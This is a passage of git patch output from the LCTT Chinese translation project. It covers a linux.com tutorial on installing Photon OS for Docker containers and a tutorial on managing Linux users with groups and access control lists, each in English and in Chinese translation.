changed, 32 insertions(+), 191 deletions(-) delete mode 100644 sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md deleted file mode 100644 index d282ef5445..0000000000 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ /dev/null @@ -1,146 +0,0 @@ -Photon Could Be Your New Favorite Container OS -============================================================ - -![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") -Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay - -Containers are all the rage, and with good reason. [As discussed previously][13], containers allow you to quickly and easily deploy new services and applications onto your network, without requiring too much in the way of added system resources. Containers are more cost-effective than using dedicated hardware or virtual machines, and they’re easier to update and reuse. - -Best of all, containers love Linux (and vice versa). Without much trouble or time, you can get a Linux server up and running with [Docker][14] and deploying containers. But, which Linux distribution is best suited for the deployment of your containers? There are a _lot_  of options. You could go with a standard Ubuntu Server platform (which makes installing Docker and deploying containers incredibly easy), or you could opt for a lighter weight distribution — one geared specifically for the purpose of deploying containers. - -One such distribution is [Photon][15]. This particular platform was created in 2005 by [VMware][16]; it includes the Docker daemon and works with container frameworks, such as Mesos and Kubernetes. Photon is optimized to work with [VMware vSphere][17], but it can be used on bare metal, [Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], or [VirtualBox][21]. - -Photon manages to stay slim by only installing what is absolutely necessary to run the Docker daemon. In the end, the distribution comes in around 300 MB. This is just enough Linux make it all work. The key features to Photon are: - -* Kernel tuned for performance. - -* Kernel is hardened according to the [Kernel Self-Protection Project][6] (KSPP). - -* All installed packages are built with hardened security flags. - -* Operating system boots with validated trust. - -* Photon management daemon manages firewall, network, packages, and users on remote Photon OS machines. - -* Support for persistent volumes. - -* [Project Lightwave][7] integration. - -* Timely security patches and updates. - -Photon can be used via [ISO][22], [OVA][23], [Amazon Machine Image][24], [Google Compute Engine image][25], and [Azure VHD][26]. I’ll show you how to install Photon on VirtualBox, using an ISO image. The installation takes about five minutes and, in the end, you’ll have a virtual machine, ready to deploy containers. - -### Creating the virtual machine - -Before you deploy that first container, you have to create the virtual machine and install Photon. To do this, open up VirtualBox and click the New button. Walk through the Create Virtual Machine wizard (giving Photon the necessary resources, based on the usage you predict the container server will need). Once you’ve created the virtual machine, you need to first make a change to the settings. Select the newly created virtual machine (in the left pane of the VirtualBox main window) and then click Settings. In the resulting window, click on Network (from the left navigation). - -In the Networking window (Figure 1), you need to change the Attached to drop-down to Bridged Adapter. This will ensure your Photon server is reachable from your network. Once you’ve made that change, click OK. - -### [photon_0.jpg][8] - -![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change settings") -Figure 1: Changing the VirtualBox network settings for Photon.[Used with permission][1] - -Select your Photon virtual machine from the left navigation and then click Start. You will be prompted to locate and attach the IOS image. Once you’ve done that, Photon will boot up and prompt you to hit Enter to begin the installation. The installation is ncurses based (there is no GUI), but it’s incredibly simple. - -In the next screen (Figure 2), you will be asked if you want to do a Minimal, Full, or OSTree Server. I opted to go the Full route. Select whichever option you require and hit enter. - -### [photon_1.jpg][9] - -![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -Figure 2: Selecting your installation type.[Used with permission][2] - -In the next window, select the disk that will house Photon. Since we’re installing this as a virtual machine, there will be only one disk listed (Figure 3). Tab down to Auto and hit Enter on your keyboard. The installation will then require you to type (and verify) an administrator password. Once you’ve done that, the installation will begin and finish in less than five minutes. - -### [photon_2.jpg][10] - -![Photon ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -Figure 3: Selecting your hard disk for the Photon installation.[Used with permission][3] - -Once the installation completes, reboot the virtual machine and log in with the username root and the password you created during installation. You are ready to start working. - -Before you begin using Docker on Photon, you’ll want to upgrade the platform. Photon uses the _yum_ package manager, so login as root and issue the command  _yum update_ .If there are any updates available, you’ll be asked to okay the process (Figure 4). - -### [photon_3.jpg][11] - -![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -Figure 4: Updating Photon.[Used with permission][4] - -Usage - -As I mentioned, Photon comes with everything you need to deploy containers or even create a Kubernetes cluster. However, out of the box, there are a few things you’ll need to do. The first thing is to enable the Docker daemon to run at start. To do this, issue the commands: - -``` -systemctl start docker - -systemctl enable docker -``` - -Now we need to create a standard user, so we’re not running the docker command as root. To do this, issue the following commands: - -``` -useradd -m USERNAME - -passwd USERNAME -``` - -Where USERNAME is the name of the user to add. - -Next we need to add the new user to the  _docker_ group with the command: - -``` -usermod -a -G docker USERNAME -``` - -Where USERNAME is the name of the user just created. - -Log out as the root user and log back in as the newly created user. You can now work with the  _docker _ command without having to make use of  _sudo_  or switching to the root user. Pull down an image from Docker Hub and start deploying containers. - -### An outstanding container platform - -Photon is, without a doubt, an outstanding platform, geared specifically for containers. Do note that Photon is an open source project, so there is no paid support to be had. If you find yourself having trouble with Photon, hop on over to the [Issues tab in the Photon Project’s Github page][27], where you can read and post about issues. And if you’re interested in forking Photon, you’ll find the source code on the project’s [official Github page][28]. - -Give Photon a try and see if it doesn’t make deploying Docker containers and/or Kubernetes clusters significantly easier. - - _Learn more about Linux through the free ["Introduction to Linux" ][29]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: 网址 - -作者:[ JACK WALLEN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/jlwallen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/licenses/category/used-permission -[5]:https://www.linux.com/licenses/category/creative-commons-zero -[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project -[7]:http://vmware.github.io/lightwave/ -[8]:https://www.linux.com/files/images/photon0jpg -[9]:https://www.linux.com/files/images/photon1jpg -[10]:https://www.linux.com/files/images/photon2jpg -[11]:https://www.linux.com/files/images/photon3jpg -[12]:https://www.linux.com/files/images/photon-linuxjpg -[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux -[14]:https://www.docker.com/ -[15]:https://vmware.github.io/photon/ -[16]:https://www.vmware.com/ -[17]:https://www.vmware.com/products/vsphere.html -[18]:https://azure.microsoft.com/ -[19]:https://cloud.google.com/compute/ -[20]:https://aws.amazon.com/ec2/ -[21]:https://www.virtualbox.org/ -[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[27]:https://github.com/vmware/photon/issues -[28]:https://github.com/vmware/photon -[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md index e51c580da9..3496f22f4a 100644 --- a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -1,109 +1,96 @@ -Photon也许能成为你最喜爱的容器操作系统 +Photon 也许能成为你最喜爱的容器操作系统 ============================================================ ![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") -Phonton OS专注于容器,是一个非常出色的平台。 —— Jack Wallen +>Phonton OS 专注于容器,是一个非常出色的平台。 —— Jack Wallen 容器在当下的火热,并不是没有原因的。正如[之前][13]讨论的,容器可以使您轻松快捷地将新的服务与应用部署到您的网络上,而且并不耗费太多的系统资源。比起专用硬件和虚拟机,容器都是更加划算的,除此之外,他们更容易更新与重用。 -更重要的是,容器喜欢Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台Linux服务器,运行[Docker][14],再是部署容器。但是,哪种Linux发行版最适合部署容器呢?我们的选择很多。你可以使用标准的Ubuntu服务器平台(更容易安装Docker并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 +更重要的是,容器喜欢 Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台 Linux 服务器,运行[Docker][14],然后部署容器。但是,哪种 Linux 发行版最适合部署容器呢?我们的选择很多。你可以使用标准的 Ubuntu 服务器平台(更容易安装 Docker 并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 -[Photon][15]就是这样的一个发行版。这个特殊的版本是由[VMware][16]于2005年创建的,它包含了Docker的守护进程,并与容器框架(如Mesos和Kubernetes)一起使用。Photon经过优化可与[VMware vSphere][17]协同工作,而且可用于裸机,[Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], 或者 [VirtualBox][21]等。 +[Photon][15] 就是这样的一个发行版。这个特殊的版本是由 [VMware][16] 于 2005 年创建的,它包含了 Docker 的守护进程,并可与容器框架(如 Mesos 和 Kubernetes )一起使用。Photon 经过优化可与 [VMware vSphere][17] 协同工作,而且可用于裸机、[Microsoft Azure][18]、 [Google Compute Engine][19]、 [Amazon Elastic Compute Cloud][20] 或者 [VirtualBox][21] 等。 -Photon通过只安装Docker守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有300MB。但这足以让Linux的运行一切正常。除此之外,Photon的主要特点还有: - -* 内核调整为性能模式。 - -* 内核根据[内核自防护项目][6](KSPP)进行了加固。 +Photon 通过只安装 Docker 守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有 300MB。但这足以让 Linux 的运行一切正常。除此之外,Photon 的主要特点还有: +* 内核为性能而调整。 +* 内核根据[内核自防护项目][6](KSPP)进行了加固。 * 所有安装的软件包都根据加固的安全标识来构建。 - * 操作系统在信任验证后启动。 - -* Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 - +* Photon 的管理进程可以管理防火墙、网络、软件包,和远程登录在 Photon 机器上的用户。 * 支持持久卷。 - * [Project Lightwave][7] 整合。 - * 及时的安全补丁与更新。 -Photon可以通过[ISO][22],[OVA][23],[Amazon Machine Image][24],[Google Compute Engine image][25]和[Azure VHD][26]安装使用。现在我将向您展示如何使用ISO镜像在VirtualBox上安装Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 +Photon 可以通过 [ISO 镜像][22]、[OVA][23]、[Amazon Machine Image][24]、[Google Compute Engine 镜像][25] 和 [Azure VHD][26] 安装使用。现在我将向您展示如何使用 ISO 镜像在 VirtualBox 上安装 Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 ### 创建虚拟机 -在部署第一台容器之前,您必须先创建一台虚拟机并安装Photon。为此,打开VirtualBox并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为Photon提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在VirtualBox主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 +在部署第一台容器之前,您必须先创建一台虚拟机并安装 Photon。为此,打开 VirtualBox 并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为 Photon 提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在 VirtualBox 主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 -在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的Photon服务与您的网络相连。完成更改后,单击确定。 - -### [photon_0.jpg][8] +在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的 Photon 服务与您的网络相连。完成更改后,单击确定。 ![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change setatings") -图 1: 更改Photon在VirtualBox中的网络设置。[经许可使用][1] -从左侧的导航选择您的Photon虚拟机,点击启动。系统会提示您去加载IOS镜像。当您完成之后,Photon安装程序将会启动并提示您按回车后开始安装。安装过程基于ncurses(没有GUI),但它非常简单。 +*图 1: 更改 Photon 在 VirtualBox 中的网络设置。[经许可使用][1]* -接下来(图2),系统会询问您是要最小化安装,完整安装还是安装OSTree服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 +从左侧的导航选择您的 Photon 虚拟机,点击启动。系统会提示您去加载 ISO 镜像。当您完成之后,Photon 安装程序将会启动并提示您按回车后开始安装。安装过程基于 ncurses(没有 GUI),但它非常简单。 -### [photon_1.jpg][9] +接下来(图2),系统会询问您是要最小化安装,完整安装还是安装 OSTree 服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 ![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -图 2: 选择您的安装类型.[经许可使用][2] -在下一个窗口,选择您要安装Photon的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到5分钟的时间内结束。 +*图 2: 选择您的安装类型。[经许可使用][2]* -### [photon_2.jpg][] +在下一个窗口,选择您要安装 Photon 的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到 5 分钟的时间内结束。 ![Photon](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -图 3: 选择安装Photon的硬盘.[经许可使用][3] -安装完成后,重启虚拟机并使用安装时创建的用户root和它的密码登录。一切就绪,你准备好开始工作了。 +*图 3: 选择安装 Photon 的硬盘。[经许可使用][3]* -在开始使用Docker之前,您需要更新一下Photon。Photon使用 _yum_ 软件包管理器,因此在以root用户登录后输入命令 _yum update_。如果有任何可用更新,则会询问您是否确认(图4)。 +安装完成后,重启虚拟机并使用安装时创建的用户 root 和它的密码登录。一切就绪,你准备好开始工作了。 -### [photon_3.jpg][11] +在开始使用 Docker 之前,您需要更新一下 Photon。Photon 使用 `yum` 软件包管理器,因此在以 root 用户登录后输入命令 `yum update`。如果有任何可用更新,则会询问您是否确认(图4)。 ![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -图 4: 更新 Photon.[经许可使用][4] -用法 +*图 4: 更新 Photon。[经许可使用][4]* -正如我所说的,Photon提供了部署容器甚至创建Kubernetes集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动Docker守护进程。为此,执行以下命令: +### 用法 + +正如我所说的,Photon 提供了部署容器甚至创建 Kubernetes 集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动 Docker 守护进程。为此,执行以下命令: ``` systemctl start docker - systemctl enable docker ``` -现在我们需要创建一个标准用户,因此我们没有以root去运行docker命令。为此,执行以下命令: +现在我们需要创建一个标准用户,以便我们可以不用 root 去运行 `docker` 命令。为此,执行以下命令: ``` useradd -m USERNAME - passwd USERNAME ``` -其中USERNAME是我们新增的用户的名称。 +其中 “USERNAME” 是我们新增的用户的名称。 -接下来,我们需要将这个新用户添加到 _docker_ 组,执行命令: +接下来,我们需要将这个新用户添加到 “docker” 组,执行命令: ``` usermod -a -G docker USERNAME ``` -其中USERNAME是刚刚创建的用户的名称。 +其中 “USERNAME” 是刚刚创建的用户的名称。 -注销root用户并切换为新增的用户。现在,您已经可以不必使用 _sudo_ 命令或者是切换到root用户来使用 _docker_命令了。从Docker Hub中取出一个镜像开始部署容器吧。 +注销 root 用户并切换为新增的用户。现在,您已经可以不必使用 `sudo` 命令或者切换到 root 用户来使用 `docker` 命令了。从 Docker Hub 中取出一个镜像开始部署容器吧。 ### 一个优秀的容器平台 -在专注于容器方面,Photon毫无疑问是一个出色的平台。请注意,Photon是一个开源项目,因此没有任何付费支持。如果您对Photon有任何的问题,请移步Photon项目的Github下的[Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对Photon感兴趣,您也可以在项目的官方[Github][28]中找到源码。 +在专注于容器方面,Photon 毫无疑问是一个出色的平台。请注意,Photon 是一个开源项目,因此没有任何付费支持。如果您对 Photon 有任何的问题,请移步 Photon 项目的 GitHub 下的 [Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对 Photon 感兴趣,您也可以在该项目的官方 [GitHub][28]中找到源码。 -尝试一下Photon吧,看看它是否能够使得Docker容器和Kubernetes集群的部署更加容易。 +尝试一下 Photon 吧,看看它是否能够使得 Docker 容器和 Kubernetes 集群的部署更加容易。 -欲了解Linux的更多信息,可以通过学习Linux基金会和edX的免费课程,[“Linux 入门”][29]。 +欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][29]。 -------------------------------------------------------------------------------- @@ -111,7 +98,7 @@ via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new 作者:[JACK WALLEN][a] 译者:[KeyLD](https://github.com/KeyLd) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 394b86f17475663803cffffd4e97ed80dfea392e Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:38:59 +0800 Subject: [PATCH 0271/1627] PUB:20171124 Photon Could Be Your New Favorite Container OS.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @KeyLD 文章的发布地址:https://linux.cn/article-9110-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/KeyLD --- .../20171124 Photon Could Be Your New Favorite Container OS.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171124 Photon Could Be Your New Favorite Container OS.md (100%) diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/published/20171124 Photon Could Be Your New Favorite Container OS.md similarity index 100% rename from translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md rename to published/20171124 Photon Could Be Your New Favorite Container OS.md From 0d47bc6d19f6194cf93a19dfd69fce276f3ec130 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 22:13:28 +0800 Subject: [PATCH 0272/1627] translated --- ...ow to Manage Users with Groups in Linux.md | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 translated/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md new file mode 100644 index 0000000000..8baac8707b --- /dev/null +++ b/translated/tech/20171201 How to Manage Users with Groups in Linux.md @@ -0,0 +1,183 @@ +如何在 Linux 系统中用用户组来管理用户 +============================================================ + +### [group-of-people-1645356_1920.jpg][1] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) + +在本教程中了解如何通过用户组和访问控制表(ACL)来管理用户。 + +[创意共享协议][4] + +当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,一个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。通过 Linux 这是完全可以实现的。但是你首先必须了解如何通过用户组和访问控制表(ACL)来管理用户。 + +我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你所需要做的一切都将在你选择的 Linux 发行版中完成。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 + +为了达到演示的目的,我将假设: + +你需要用下面两个用户名新建两个用户: + +* olivia + +* nathan + +你需要新建以下两个用户组: + +* readers + +* editors + +olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的用法。你可以扩展这个任务以适应你其他更大的需求。 + +我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 + +### 创建用户 + +我们需要做的第一件事是为我们的实验创建两个用户。可以用 ``useradd`` 命令来创建用户,我们不只是简单地创建一个用户,而需要同时创建用户和属于他们的家目录,然后给他们设置密码。 + +``` +sudo useradd -m olivia + +sudo useradd -m nathan +``` + +我们现在创建了两个用户,如果你看看 ``/home`` 目录,你可以发现他们的家目录(因为我们用了 -m 选项,可以帮在创建用户的同时创建他们的家目录。 + +之后,我们可以用以下命令给他们设置密码: + +``` +sudo passwd olivia + +sudo passwd nathan +``` + +就这样,我们创建了两个用户。 + +### 创建用户组并添加用户 + +现在我们将创建 readers 和 editors 用户组,然后给它们添加用户。创建用户组的命令是: + +``` +addgroup readers + +addgroup editors +``` + +(译者注:当你使用 CentOS 等一些 Linux 发行版时,可能系统没有 addgroup 这个命令,推荐使用 groupadd 命令来替换 addgroup 命令以达到同样的效果) + + +### [groups_1.jpg][2] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) + +图一:我们可以使用刚创建的新用户组了。 + +[Used with permission][5] + +创建用户组后,我们需要给他们添加用户。我们用以下命令来将 nathan 添加到 readers 用户组: + +``` +sudo usermod -a -G readers nathan +``` +用以下命令将 olivia 添加到 editors 用户组: + +``` +sudo usermod -a -G editors olivia +``` + +现在我们已经准备好用用户组来管理用户了。 + +### 给用户组授予目录的权限 + +假设你有个目录 ``/READERS``,允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: + +``` +sudo chown -R :readers /READERS +``` + +接下来,执行以下命令收回目录所属用户组的写入权限: + +``` +sudo chmod -R g-w /READERS +``` + +然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在读者组中的用户访问这个目录里的文件): + +``` +sudo chmod -R o-x /READERS +``` + +这时候,只有目录的所有者(root)和用户组 reader 中的用户可以访问 ``/READES`` 中的文件。 + +假设你有个目录 ``/EDITORS`` ,你需要给用户组 editors 里的成员这个目录的读和写的权限。为了达到这个目的,执行下面的这些命令是必要的: + +``` +sudo chown -R :editors /EDITORS + +sudo chmod -R g+w /EDITORS + +sudo chmod -R o-x /EDITORS +``` + +此时 editors 用户组的所有成员都可以访问和修改其中的文件。除此之外其他用户(除了 root 之外)无法访问 ``/EDITORS`` 中的任何文件。 + +使用这个方法的问题在于,你一次只能操作一个组和一个目录而已。这时候访问控制表(ACL)就可以派得上用场了。 + + +### 使用访问控制表(ACL) + +现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 + +这个命令的结构如下: + +``` +setfacl OPTION X:NAME:Y /DIRECTORY +``` + +其中 OPTION 是可选选项,X 可以是 u(用户)或者是 g (用户组),NAME 是用户或者用户组的名字,/DIRECTORY 是要用到的目录。我们将使用 -m 选项进行修改(modify)。因此,我们给 readers 用户组添加读取权限的命令是: + +``` +sudo setfacl -m g:readers:rx -R /DATA +``` + +现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 + +为了给 editors 用户组里面的用户读写权限,我们执行了以下的命令: + +``` +sudo setfacl -m g:editors:rwx -R /DATA +``` +上述命令将赋予 editors 用户组中的任何成员读取权限,同时保留 readers 用户组的只读权限。 + +### 更多的权限控制 + +使用访问控制表(ACL),你可以实现你所需的权限控制。你可以实现将用户添加到用户组,并且可靠灵活地控制这些用户组对每个目录的权限以达到你的需求。想要了解上述工具的更多信息,可以执行下列的命令: + +* man usradd + +* man addgroup + +* man usermod + +* man sefacl + +* man chown + +* man chmod + + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux + +作者:[Jack Wallen ] +译者:[imquanquan](https://github.com/imquanquan) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/group-people-16453561920jpg +[2]:https://www.linux.com/files/images/groups1jpg +[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[4]:https://www.linux.com/licenses/category/creative-commons-zero +[5]:https://www.linux.com/licenses/category/used-permission From 05c023a7ee532f3119e59a69bedf317008b3a6d5 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 22:33:42 +0800 Subject: [PATCH 0273/1627] Delete 20171201 How to Manage Users with Groups in Linux.md --- ...ow to Manage Users with Groups in Linux.md | 168 ------------------ 1 file changed, 168 deletions(-) delete mode 100644 sources/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md deleted file mode 100644 index 35350c819f..0000000000 --- a/sources/tech/20171201 How to Manage Users with Groups in Linux.md +++ /dev/null @@ -1,168 +0,0 @@ -translating---imquanquan - -How to Manage Users with Groups in Linux -============================================================ - -### [group-of-people-1645356_1920.jpg][1] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) - -Learn how to work with users, via groups and access control lists in this tutorial. - -[Creative Commons Zero][4] - -Pixabay - -When you administer a Linux machine that houses multiple users, there might be times when you need to take more control over those users than the basic user tools offer. This idea comes to the fore especially when you need to manage permissions for certain users. Say, for example, you have a directory that needs to be accessed with read/write permissions by one group of users and only read permissions for another group. With Linux, this is entirely possible. To make this happen, however, you must first understand how to work with users, via groups and access control lists (ACLs). - -We’ll start from the beginning with users and work our way to the more complex ACLs. Everything you need to make this happen will be included in your Linux distribution of choice. We won’t touch on the basics of users, as the focus on this article is about groups. - -For the purpose of this piece, I’m going to assume the following: - -You need to create two users with usernames: - -* olivia - -* nathan - -You need to create two groups: - -* readers - -* editors - -Olivia needs to be a member of the group editors, while nathan needs to be a member of the group readers. The group readers needs to only have read permission to the directory /DATA, whereas the group editors needs to have both read and write permission to the /DATA directory. This, of course, is very minimal, but it will give you the basic information you need to expand the tasks to fit your much larger needs. - -I’ll be demonstrating on the Ubuntu 16.04 Server platform. The commands will be universal—the only difference would be if your distribution of choice doesn’t make use of sudo. If this is the case, you’ll have to first su to the root user to issue the commands that require sudo in the demonstrations. - -### Creating the users - -The first thing we need to do is create the two users for our experiment. User creation is handled with the useradd command. Instead of just simply creating the users we need to create them both with their own home directories and then give them passwords. - -The first thing we do is create the users. To do this, issue the commands: - -``` -sudo useradd -m olivia - -sudo useradd -m nathan -``` - -Next each user must have a password. To add passwords into the mix, you’d issue the following commands: - -``` -sudo passwd olivia - -sudo passwd nathan -``` - -That’s it, your users are created. - -### Creating groups and adding users - -Now we’re going to create the groups readers and editors and then add users to them. The commands to create our groups are: - -``` -addgroup readers - -addgroup editors -``` - -### [groups_1.jpg][2] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) - -Figure 1: Our new groups ready to be used. - -[Used with permission][5] - -With our groups created, we need to add our users. We’ll add user nathan to group readers with the command: - -``` -sudo usermod -a -G readers nathan -``` - -``` -sudo usermod -a -G editors olivia -``` - -### Giving groups permissions to directories - -Let’s say you have the directory /READERS and you need to allow all members of the readers group access to that directory. First, change the group of the folder with the command: - -``` -sudo chown -R :readers /READERS -``` - -``` -sudo chmod -R g-w /READERS -``` - -``` -sudo chmod -R o-x /READERS -``` - -Let’s say you have the directory /EDITORS and you need to give members of the editors group read and write permission to its contents. To do that, the following command would be necessary: - -``` -sudo chown -R :editors /EDITORS - -sudo chmod -R g+w /EDITORS - -sudo chmod -R o-x /EDITORS -``` - -The problem with using this method is you can only add one group to a directory at a time. This is where access control lists come in handy. - -### Using access control lists - -Now, let’s get tricky. Say you have a single folder—/DATA—and you want to give members of the readers group read permission and members of the group editors read/write permissions. To do that, you must take advantage of the setfacl command. The setfacl command sets file access control lists for files and folders. - -The structure of this command looks like this: - -``` -setfacl OPTION X:NAME:Y /DIRECTORY -``` - -``` -sudo setfacl -m g:readers:rx -R /DATA -``` - -To give members of the editors group read/write permissions (while retaining read permissions for the readers group), we’d issue the command; - -``` -sudo setfacl -m g:editors:rwx -R /DATA -``` - -### All the control you need - -And there you have it. You can now add members to groups and control those groups’ access to various directories with all the power and flexibility you need. To read more about the above tools, issue the commands: - -* man usradd - -* man addgroup - -* man usermod - -* man sefacl - -* man chown - -* man chmod - -Learn more about Linux through the free ["Introduction to Linux" ][3]course from The Linux Foundation and edX. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux - -作者:[Jack Wallen ] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 